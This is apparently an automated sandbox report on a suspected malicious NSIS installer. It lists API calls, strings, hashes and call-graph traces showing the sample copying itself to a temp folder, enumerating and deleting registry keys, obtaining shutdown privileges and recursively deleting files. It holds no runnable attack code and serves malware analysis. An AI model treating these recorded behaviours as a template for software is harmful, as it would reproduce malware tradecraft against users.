                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0549454D
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05494530
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05494507
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05494592
                                                                                                                                                                                                                                • Execute=1, xrefs: 0549451E
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 054944AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05494460
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                • Opcode ID: 7db1533a344ff461f164342cc2ad5f3df6d54c846e6351a24fefcbf530420e20
                                                                                                                                                                                                                                • Instruction ID: 02b5b3e09517fd1116932a03c78ac7ab8423e1e04ecb0ad77a8e32ca08c643d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db1533a344ff461f164342cc2ad5f3df6d54c846e6351a24fefcbf530420e20
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B812771D042699BDB25DF54CC45BEEB6B8AF08710F0041EBE90AB7250D7709E859FA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:21.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1354
                                                                                                                                                                                                                                Total number of Limit Nodes:29
404592 SetBkColor 3287->3288 3289 40459c 3287->3289 3288->3289 3289->3279 3290 4045b6 CreateBrushIndirect 3289->3290 3291 4045af DeleteObject 3289->3291 3290->3279 3291->3290 3292 401b9b 3293 401ba8 3292->3293 3294 401bec 3292->3294 3300 401c31 3293->3300 3301 401bbf 3293->3301 3295 401c16 GlobalAlloc 3294->3295 3298 401bf1 3294->3298 3296 40657a 17 API calls 3295->3296 3296->3300 3297 40657a 17 API calls 3302 402397 3297->3302 3305 40239d 3298->3305 3313 40653d lstrcpynW 3298->3313 3300->3297 3300->3305 3311 40653d lstrcpynW 3301->3311 3314 405b9d 3302->3314 3303 401c03 GlobalFree 3303->3305 3306 401bce 3312 40653d lstrcpynW 3306->3312 3309 401bdd 3318 40653d lstrcpynW 3309->3318 3311->3306 3312->3309 3313->3303 3315 405bb2 3314->3315 3316 405bfe 3315->3316 3317 405bc6 MessageBoxIndirectW 3315->3317 3316->3305 3317->3316 3318->3305 4304 40261c 4305 402da6 17 API calls 4304->4305 4306 402623 4305->4306 4309 40602d GetFileAttributesW CreateFileW 4306->4309 4308 40262f 4309->4308 3658 40259e 3669 402de6 3658->3669 3661 402d84 17 API calls 3662 4025b1 3661->3662 3663 4025d9 RegEnumValueW 3662->3663 3664 4025cd RegEnumKeyW 3662->3664 3667 40292e 3662->3667 3665 4025f5 RegCloseKey 3663->3665 3666 4025ee 3663->3666 3664->3665 3665->3667 3666->3665 3670 402da6 17 API calls 3669->3670 3671 402dfd 3670->3671 3672 4063aa RegOpenKeyExW 3671->3672 3673 4025a8 3672->3673 3673->3661 4310 40149e 4311 4014ac PostQuitMessage 4310->4311 4312 40239d 4310->4312 4311->4312 4313 4015a3 4314 402da6 17 API calls 4313->4314 4315 4015aa SetFileAttributesW 4314->4315 4316 4015bc 4315->4316 4317 401fa4 4318 402da6 17 API calls 4317->4318 4319 401faa 4318->4319 4320 40559f 24 API calls 4319->4320 4321 401fb4 4320->4321 4322 405b20 2 API calls 4321->4322 4323 401fba 4322->4323 4324 401fdd CloseHandle 4323->4324 4325 40292e 4323->4325 4326 4069b5 5 API calls 4323->4326 4324->4325 4328 401fcf 4326->4328 4328->4324 4330 406484 wsprintfW 4328->4330 4330->4324 4331 40202a 4332 402da6 17 API calls 
4331->4332 4333 402031 4332->4333 4334 40690a 5 API calls 4333->4334 4335 402040 4334->4335 4336 4020cc 4335->4336 4337 40205c GlobalAlloc 4335->4337 4337->4336 4338 402070 4337->4338 4339 40690a 5 API calls 4338->4339 4340 402077 4339->4340 4341 40690a 5 API calls 4340->4341 4342 402081 4341->4342 4342->4336 4346 406484 wsprintfW 4342->4346 4344 4020ba 4347 406484 wsprintfW 4344->4347 4346->4344 4347->4336 4348 40252a 4349 402de6 17 API calls 4348->4349 4350 402534 4349->4350 4351 402da6 17 API calls 4350->4351 4352 40253d 4351->4352 4353 402548 RegQueryValueExW 4352->4353 4354 40292e 4352->4354 4355 402568 4353->4355 4358 40256e RegCloseKey 4353->4358 4355->4358 4359 406484 wsprintfW 4355->4359 4358->4354 4359->4358 4360 4021aa 4361 402da6 17 API calls 4360->4361 4362 4021b1 4361->4362 4363 402da6 17 API calls 4362->4363 4364 4021bb 4363->4364 4365 402da6 17 API calls 4364->4365 4366 4021c5 4365->4366 4367 402da6 17 API calls 4366->4367 4368 4021cf 4367->4368 4369 402da6 17 API calls 4368->4369 4370 4021d9 4369->4370 4371 402218 CoCreateInstance 4370->4371 4372 402da6 17 API calls 4370->4372 4375 402237 4371->4375 4372->4371 4373 401423 24 API calls 4374 4022f6 4373->4374 4375->4373 4375->4374 4376 403baa 4377 403bb5 4376->4377 4378 403bb9 4377->4378 4379 403bbc GlobalAlloc 4377->4379 4379->4378 3329 40352d SetErrorMode GetVersionExW 3330 4035b7 3329->3330 3331 40357f GetVersionExW 3329->3331 3332 403610 3330->3332 3333 40690a 5 API calls 3330->3333 3331->3330 3334 40689a 3 API calls 3332->3334 3333->3332 3335 403626 lstrlenA 3334->3335 3335->3332 3336 403636 3335->3336 3337 40690a 5 API calls 3336->3337 3338 40363d 3337->3338 3339 40690a 5 API calls 3338->3339 3340 403644 3339->3340 3341 40690a 5 API calls 3340->3341 3345 403650 #17 OleInitialize SHGetFileInfoW 3341->3345 3344 40369d GetCommandLineW 3421 40653d lstrcpynW 3344->3421 3420 40653d lstrcpynW 3345->3420 3347 4036af 3348 405e39 CharNextW 3347->3348 3349 4036d5 CharNextW 3348->3349 3361 4036e6 
3349->3361 3350 4037e4 3351 4037f8 GetTempPathW 3350->3351 3422 4034fc 3351->3422 3353 403810 3355 403814 GetWindowsDirectoryW lstrcatW 3353->3355 3356 40386a DeleteFileW 3353->3356 3354 405e39 CharNextW 3354->3361 3357 4034fc 12 API calls 3355->3357 3432 40307d GetTickCount GetModuleFileNameW 3356->3432 3359 403830 3357->3359 3359->3356 3362 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3359->3362 3360 40387d 3364 403941 3360->3364 3366 403932 3360->3366 3371 405e39 CharNextW 3360->3371 3361->3350 3361->3354 3363 4037e6 3361->3363 3365 4034fc 12 API calls 3362->3365 3516 40653d lstrcpynW 3363->3516 3524 403b12 3364->3524 3370 403862 3365->3370 3460 403bec 3366->3460 3370->3356 3370->3364 3387 40389f 3371->3387 3373 403a69 3375 405b9d MessageBoxIndirectW 3373->3375 3374 403a7e 3376 403a86 GetCurrentProcess OpenProcessToken 3374->3376 3377 403afc ExitProcess 3374->3377 3381 403a76 ExitProcess 3375->3381 3382 403acc 3376->3382 3383 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3376->3383 3379 403908 3384 405f14 18 API calls 3379->3384 3380 403949 3386 405b08 5 API calls 3380->3386 3385 40690a 5 API calls 3382->3385 3383->3382 3388 403914 3384->3388 3389 403ad3 3385->3389 3390 40394e lstrcatW 3386->3390 3387->3379 3387->3380 3388->3364 3517 40653d lstrcpynW 3388->3517 3393 403ae8 ExitWindowsEx 3389->3393 3396 403af5 3389->3396 3391 40396a lstrcatW lstrcmpiW 3390->3391 3392 40395f lstrcatW 3390->3392 3391->3364 3394 40398a 3391->3394 3392->3391 3393->3377 3393->3396 3397 403996 3394->3397 3398 40398f 3394->3398 3400 40140b 2 API calls 3396->3400 3402 405aeb 2 API calls 3397->3402 3401 405a6e 4 API calls 3398->3401 3399 403927 3518 40653d lstrcpynW 3399->3518 3400->3377 3404 403994 3401->3404 3405 40399b SetCurrentDirectoryW 3402->3405 3404->3405 3406 4039b8 3405->3406 3407 4039ad 3405->3407 3520 40653d lstrcpynW 3406->3520 3519 40653d lstrcpynW 3407->3519 3410 40657a 17 API calls 3411 4039fa DeleteFileW 3410->3411 3412 403a06 
CopyFileW 3411->3412 3417 4039c5 3411->3417 3412->3417 3413 403a50 3415 4062fd 36 API calls 3413->3415 3414 4062fd 36 API calls 3414->3417 3415->3364 3416 40657a 17 API calls 3416->3417 3417->3410 3417->3413 3417->3414 3417->3416 3419 403a3a CloseHandle 3417->3419 3521 405b20 CreateProcessW 3417->3521 3419->3417 3420->3344 3421->3347 3423 4067c4 5 API calls 3422->3423 3425 403508 3423->3425 3424 403512 3424->3353 3425->3424 3426 405e0c 3 API calls 3425->3426 3427 40351a 3426->3427 3428 405aeb 2 API calls 3427->3428 3429 403520 3428->3429 3430 40605c 2 API calls 3429->3430 3431 40352b 3430->3431 3431->3353 3531 40602d GetFileAttributesW CreateFileW 3432->3531 3434 4030bd 3452 4030cd 3434->3452 3532 40653d lstrcpynW 3434->3532 3436 4030e3 3437 405e58 2 API calls 3436->3437 3438 4030e9 3437->3438 3533 40653d lstrcpynW 3438->3533 3440 4030f4 GetFileSize 3441 4031ee 3440->3441 3459 40310b 3440->3459 3534 403019 3441->3534 3443 4031f7 3445 403227 GlobalAlloc 3443->3445 3443->3452 3569 4034e5 SetFilePointer 3443->3569 3545 4034e5 SetFilePointer 3445->3545 3447 40325a 3449 403019 6 API calls 3447->3449 3449->3452 3450 403210 3453 4034cf ReadFile 3450->3453 3451 403242 3546 4032b4 3451->3546 3452->3360 3455 40321b 3453->3455 3455->3445 3455->3452 3456 403019 6 API calls 3456->3459 3457 40324e 3457->3452 3457->3457 3458 40328b SetFilePointer 3457->3458 3458->3452 3459->3441 3459->3447 3459->3452 3459->3456 3566 4034cf 3459->3566 3461 40690a 5 API calls 3460->3461 3462 403c00 3461->3462 3463 403c06 3462->3463 3464 403c18 3462->3464 3590 406484 wsprintfW 3463->3590 3465 40640b 3 API calls 3464->3465 3466 403c48 3465->3466 3468 403c67 lstrcatW 3466->3468 3470 40640b 3 API calls 3466->3470 3469 403c16 3468->3469 3575 403ec2 3469->3575 3470->3468 3473 405f14 18 API calls 3474 403c99 3473->3474 3475 403d2d 3474->3475 3477 40640b 3 API calls 3474->3477 3476 405f14 18 API calls 3475->3476 3478 403d33 3476->3478 3479 403ccb 3477->3479 3480 403d43 LoadImageW 3478->3480 3481 40657a 17 
API calls 3478->3481 3479->3475 3484 403cec lstrlenW 3479->3484 3487 405e39 CharNextW 3479->3487 3482 403de9 3480->3482 3483 403d6a RegisterClassW 3480->3483 3481->3480 3486 40140b 2 API calls 3482->3486 3485 403da0 SystemParametersInfoW CreateWindowExW 3483->3485 3515 403df3 3483->3515 3488 403d20 3484->3488 3489 403cfa lstrcmpiW 3484->3489 3485->3482 3490 403def 3486->3490 3492 403ce9 3487->3492 3491 405e0c 3 API calls 3488->3491 3489->3488 3493 403d0a GetFileAttributesW 3489->3493 3494 403ec2 18 API calls 3490->3494 3490->3515 3495 403d26 3491->3495 3492->3484 3496 403d16 3493->3496 3498 403e00 3494->3498 3591 40653d lstrcpynW 3495->3591 3496->3488 3497 405e58 2 API calls 3496->3497 3497->3488 3500 403e0c ShowWindow 3498->3500 3501 403e8f 3498->3501 3503 40689a 3 API calls 3500->3503 3583 405672 OleInitialize 3501->3583 3505 403e24 3503->3505 3504 403e95 3506 403eb1 3504->3506 3507 403e99 3504->3507 3508 403e32 GetClassInfoW 3505->3508 3510 40689a 3 API calls 3505->3510 3509 40140b 2 API calls 3506->3509 3513 40140b 2 API calls 3507->3513 3507->3515 3511 403e46 GetClassInfoW RegisterClassW 3508->3511 3512 403e5c DialogBoxParamW 3508->3512 3509->3515 3510->3508 3511->3512 3514 40140b 2 API calls 3512->3514 3513->3515 3514->3515 3515->3364 3516->3351 3517->3399 3518->3366 3519->3406 3520->3417 3522 405b53 CloseHandle 3521->3522 3523 405b5f 3521->3523 3522->3523 3523->3417 3525 403b2a 3524->3525 3526 403b1c CloseHandle 3524->3526 3593 403b57 3525->3593 3526->3525 3529 405c49 67 API calls 3530 403a5e OleUninitialize 3529->3530 3530->3373 3530->3374 3531->3434 3532->3436 3533->3440 3535 403022 3534->3535 3536 40303a 3534->3536 3537 403032 3535->3537 3538 40302b DestroyWindow 3535->3538 3539 403042 3536->3539 3540 40304a GetTickCount 3536->3540 3537->3443 3538->3537 3570 406946 3539->3570 3542 403058 CreateDialogParamW ShowWindow 3540->3542 3543 40307b 3540->3543 3542->3543 3543->3443 3545->3451 3547 4032cd 3546->3547 3548 4032fb 3547->3548 3574 4034e5 SetFilePointer 
3547->3574 3550 4034cf ReadFile 3548->3550 3551 403306 3550->3551 3552 403468 3551->3552 3553 403318 GetTickCount 3551->3553 3555 403452 3551->3555 3554 4034aa 3552->3554 3559 40346c 3552->3559 3553->3555 3562 403367 3553->3562 3556 4034cf ReadFile 3554->3556 3555->3457 3556->3555 3557 4034cf ReadFile 3557->3562 3558 4034cf ReadFile 3558->3559 3559->3555 3559->3558 3560 4060df WriteFile 3559->3560 3560->3559 3561 4033bd GetTickCount 3561->3562 3562->3555 3562->3557 3562->3561 3563 4033e2 MulDiv wsprintfW 3562->3563 3565 4060df WriteFile 3562->3565 3564 40559f 24 API calls 3563->3564 3564->3562 3565->3562 3567 4060b0 ReadFile 3566->3567 3568 4034e2 3567->3568 3568->3459 3569->3450 3571 406963 PeekMessageW 3570->3571 3572 403048 3571->3572 3573 406959 DispatchMessageW 3571->3573 3572->3443 3573->3571 3574->3548 3576 403ed6 3575->3576 3592 406484 wsprintfW 3576->3592 3578 403f47 3579 403f7b 18 API calls 3578->3579 3581 403f4c 3579->3581 3580 403c77 3580->3473 3581->3580 3582 40657a 17 API calls 3581->3582 3582->3581 3584 4044e5 SendMessageW 3583->3584 3587 405695 3584->3587 3585 4056bc 3586 4044e5 SendMessageW 3585->3586 3588 4056ce OleUninitialize 3586->3588 3587->3585 3589 401389 2 API calls 3587->3589 3588->3504 3589->3587 3590->3469 3591->3475 3592->3578 3595 403b65 3593->3595 3594 403b2f 3594->3529 3595->3594 3596 403b6a FreeLibrary GlobalFree 3595->3596 3596->3594 3596->3596 4380 401a30 4381 402da6 17 API calls 4380->4381 4382 401a39 ExpandEnvironmentStringsW 4381->4382 4383 401a60 4382->4383 4384 401a4d 4382->4384 4384->4383 4385 401a52 lstrcmpW 4384->4385 4385->4383 4391 4023b2 4392 4023ba 4391->4392 4395 4023c0 4391->4395 4393 402da6 17 API calls 4392->4393 4393->4395 4394 402da6 17 API calls 4396 4023ce 4394->4396 4395->4394 4395->4396 4397 402da6 17 API calls 4396->4397 4399 4023dc 4396->4399 4397->4399 4398 402da6 17 API calls 4400 4023e5 WritePrivateProfileStringW 4398->4400 4399->4398 4401 402434 4402 402467 4401->4402 4403 40243c 4401->4403 4404 402da6 
17 API calls 4402->4404 4405 402de6 17 API calls 4403->4405 4407 40246e 4404->4407 4406 402443 4405->4406 4409 402da6 17 API calls 4406->4409 4410 40247b 4406->4410 4412 402e64 4407->4412 4411 402454 RegDeleteValueW RegCloseKey 4409->4411 4411->4410 4413 402e71 4412->4413 4414 402e78 4412->4414 4413->4410 4414->4413 4416 402ea9 4414->4416 4417 4063aa RegOpenKeyExW 4416->4417 4418 402ed7 4417->4418 4419 402ee7 RegEnumValueW 4418->4419 4426 402f81 4418->4426 4428 402f0a 4418->4428 4420 402f71 RegCloseKey 4419->4420 4419->4428 4420->4426 4421 402f46 RegEnumKeyW 4422 402f4f RegCloseKey 4421->4422 4421->4428 4423 40690a 5 API calls 4422->4423 4424 402f5f 4423->4424 4424->4426 4427 402f63 RegDeleteKeyW 4424->4427 4425 402ea9 6 API calls 4425->4428 4426->4413 4427->4426 4428->4420 4428->4421 4428->4422 4428->4425 4429 401735 4430 402da6 17 API calls 4429->4430 4431 40173c SearchPathW 4430->4431 4432 401757 4431->4432 4433 401d38 4434 402d84 17 API calls 4433->4434 4435 401d3f 4434->4435 4436 402d84 17 API calls 4435->4436 4437 401d4b GetDlgItem 4436->4437 4438 402638 4437->4438 4439 4014b8 4440 4014be 4439->4440 4441 401389 2 API calls 4440->4441 4442 4014c6 4441->4442 4443 40263e 4444 402652 4443->4444 4445 40266d 4443->4445 4446 402d84 17 API calls 4444->4446 4447 402672 4445->4447 4448 40269d 4445->4448 4455 402659 4446->4455 4450 402da6 17 API calls 4447->4450 4449 402da6 17 API calls 4448->4449 4451 4026a4 lstrlenW 4449->4451 4452 402679 4450->4452 4451->4455 4460 40655f WideCharToMultiByte 4452->4460 4454 40268d lstrlenA 4454->4455 4456 4026d1 4455->4456 4457 4026e7 4455->4457 4459 40610e 5 API calls 4455->4459 4456->4457 4458 4060df WriteFile 4456->4458 4458->4457 4459->4456 4460->4454

Control-flow Graph

[Graph image not reproduced. Legend: Executed, Not Executed]
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403550
• GetVersionExW.KERNEL32(?), ref: 00403579
• GetVersionExW.KERNEL32(0000011C), ref: 00403590
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
• #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
• OleInitialize.OLE32(00000000), ref: 0040366A
• SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
• GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
• CharNextW.USER32(00000000,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000020,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000000), ref: 004036D6
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
• DeleteFileW.KERNELBASE(1033), ref: 0040386F
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Program Files (x86)\E6l40hhe,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe",00000000,?), ref: 0040397C
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
• DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
• CopyFileW.KERNEL32(C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,0042AA28,00000001), ref: 00403A0E
• CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
• OleUninitialize.OLE32(?), ref: 00403A5E
• ExitProcess.KERNEL32 ref: 00403A78
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
• OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
• ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"$.tmp$1033$C:\Program Files (x86)\E6l40hhe$C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                • API String ID: 3859024572-1296904760
                                                                                                                                                                                                                                • Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 457 405cc1-405cc2 call 405e58 449->457 458 405cb4-405cbf lstrcatW 449->458 450->447 453 405dba-405dbd 450->453 451->449 451->450 455 405dc7-405dcf call 406873 453->455 456 405dbf-405dc5 453->456 455->447 466 405dd1-405de5 call 405e0c call 405c01 455->466 456->447 460 405cc7-405ccb 457->460 458->460 462 405cd7-405cdd lstrcatW 460->462 463 405ccd-405cd5 460->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->456 488 405dec-405dfb call 40559f call 4062fd 482->488 483->447 484->475 489 405d4c-405d55 call 405c49 484->489 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 488->447 489->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
